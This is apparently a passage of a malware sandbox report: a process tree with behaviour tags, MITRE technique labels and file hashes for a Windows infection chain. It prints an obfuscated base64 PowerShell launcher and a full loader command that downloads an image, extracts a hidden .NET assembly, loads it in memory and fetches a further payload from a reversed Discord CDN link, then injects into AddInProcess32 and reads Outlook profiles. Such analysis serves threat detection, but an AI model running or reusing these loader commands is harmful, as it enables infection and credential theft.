βYQBtβ β¨ β β³ βEQβ β¨ β β³ βYQB0β β¨ β β³ βGEβ β¨ β β³ βXβ β¨ β β³ ββ β¨ β β³ βnβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βLβ β¨ β β³ ββ β¨ β β³ βgβ β¨ β β³ βCcβ β¨ β β³ βcβ β¨ β β³ βBlβ β¨ β β³ βHMβ β¨ β β³ βcwBlβ β¨ β β³ βGcβ β¨ β β³ βdQBlβ β¨ β β³ βGkβ β¨ β β³ βcgBvβ β¨ β β³ βCcβ β¨ β β³ βLβ β¨ β β³ ββ β¨ β β³ βnβ β¨ β β³ βEEβ β¨ β β³ βZβ β¨ β β³ βBkβ β¨ β β³ βEkβ β¨ β β³ βbgBQβ β¨ β β³ βHIβ β¨ β β³ βbwBjβ β¨ β β³ βGUβ β¨ β β³ βcwBzβ β¨ β β³ βDMβ β¨ β β³ βMgβ β¨ β β³ βnβ β¨ β β³ βCwβ β¨ β β³ βJwBkβ β¨ β β³ βGUβ β¨ β β³ βcwBhβ β¨ β β³ βHQβ β¨ β β³ βaQB2β β¨ β β³ βGEβ β¨ β β³ βZβ β¨ β β³ βBvβ β¨ β β³ βCcβ β¨ β β³ βKQβ β¨ β β³ βpβ β¨ β β³ ββ β¨ β β³ β==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('β β¨ β β³ β','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0543281f1eb0b4b1a8a310bd381ad94bbd105a287a25ec79a72fed902422e9c1=mh&92b1fc66=si&9ac60d66=xe?txt.ekanS/0722766227383338721/0255869752869238721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'pessegueiro','AddInProcess32','desativado'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\pessegueiro.js"4⤵PID:3424
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:2032
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:2532
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3616
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82